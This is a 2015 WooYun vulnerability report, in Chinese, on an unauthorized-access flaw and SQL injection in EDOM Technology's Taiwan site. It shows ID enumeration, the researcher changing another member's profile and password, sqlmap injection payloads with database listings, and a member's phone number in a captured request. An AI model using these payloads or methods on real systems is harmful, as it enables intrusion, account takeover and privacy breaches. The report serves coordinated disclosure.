当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0164716

漏洞标题:EDOM益登科某处未授权访问(泄漏8万会员详细信息+任意修改8万用户信息和密码)(臺灣地區)

相关厂商:EDOM益登科技

漏洞作者: 路人甲

提交时间:2015-12-26 17:32

修复时间:2016-02-09 23:29

公开时间:2016-02-09 23:29

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-26: 细节已通知厂商并且等待厂商处理中
2015-12-28: 厂商已经确认,细节仅向厂商公开
2016-01-07: 细节向核心白帽子及相关领域专家公开
2016-01-17: 细节向普通白帽子公开
2016-01-27: 细节向实习白帽子公开
2016-02-09: 细节向公众公开

简要描述:

EDOM益登科某处未授权访问(泄漏8万会员详细信息+任意修改8万用户信息和密码)
求个首页

详细说明:

http://**.**.**.**/tw/index.jsp
注册一个帐号
abc888999邮箱9564****@**.**.**.**
密码123456
登入之后

T9MS5XZ4WK(7Q]5NOKOXVXA.png


抓个包:

op=doup&m=logon&id=79525&name=%E8%97%8D%E5%A3%AB%E6%89%BF&phone=0926379437&email=eastamis%**.**.**.**&address=&companyc=%E7%84%A1&companye=%E7%84%A1&division=&jobtitle=%E5%B7%A5%E7%A8%8B%E5%B8%AB&country=205


可以看出我的id是79525
接近8万会员
来演示一下,随便遍历

[KFB0TH]6V@L1MT7P[@_DZC.png


E~Y]FDTQV8PVCG@L[MTJX4V.png


修改她资料。改成我是你哥

A%X(HZ4YEXJ%4%AK`T7BWRG.png


然后修改密码
不谢

G2)$12IIYIC9)(CO)(T8J)I.png


N]`2H}38R_J6829BMBC0MFH.png

漏洞证明:

0x02
这个站点分公司还是很多的

HON638YAF174D0H`5{OID6K.png


注入点:

http://**.**.**.**/tw/index.jsp?m=newsview&id=2853


两个参数都存在注入

Place: GET
Parameter: id
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: m=groupview&id=116' AND 2063=CONVERT(INT,(CHAR(58)+CHAR(122)+CHAR(
07)+CHAR(121)+CHAR(58)+(SELECT (CASE WHEN (2063=2063) THEN CHAR(49) ELSE CHAR(4
) END))+CHAR(58)+CHAR(121)+CHAR(113)+CHAR(101)+CHAR(58))) AND 'XdNt'='XdNt
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: m=groupview&id=116' UNION ALL SELECT CHAR(58)+CHAR(122)+CHAR(107)+
HAR(121)+CHAR(58)+CHAR(75)+CHAR(87)+CHAR(115)+CHAR(90)+CHAR(101)+CHAR(71)+CHAR(
5)+CHAR(112)+CHAR(109)+CHAR(97)+CHAR(58)+CHAR(121)+CHAR(113)+CHAR(101)+CHAR(58)
-  AND 'huJP'='huJP
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: m=groupview&id=116'; WAITFOR DELAY '0:0:5';-- AND 'crRA'='crRA
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: m=groupview&id=116' WAITFOR DELAY '0:0:5'-- AND 'iqOt'='iqOt
---
[17:09:34] [INFO] testing MySQL
[17:09:35] [WARNING] the back-end DBMS is not MySQL
[17:09:35] [INFO] testing Oracle
[17:09:36] [WARNING] the back-end DBMS is not Oracle
[17:09:36] [INFO] testing PostgreSQL
[17:09:37] [WARNING] the back-end DBMS is not PostgreSQL
[17:09:37] [INFO] testing Microsoft SQL Server
[17:09:38] [INFO] confirming Microsoft SQL Server
[17:09:41] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
[17:09:41] [INFO] fetching current user
current user:    'edomuser'


available databases [9]:
[*] agent
[*] edom
[*] ePortal_HR
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb


修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-12-28 17:30

厂商回复:

感謝通報

最新状态:

暂无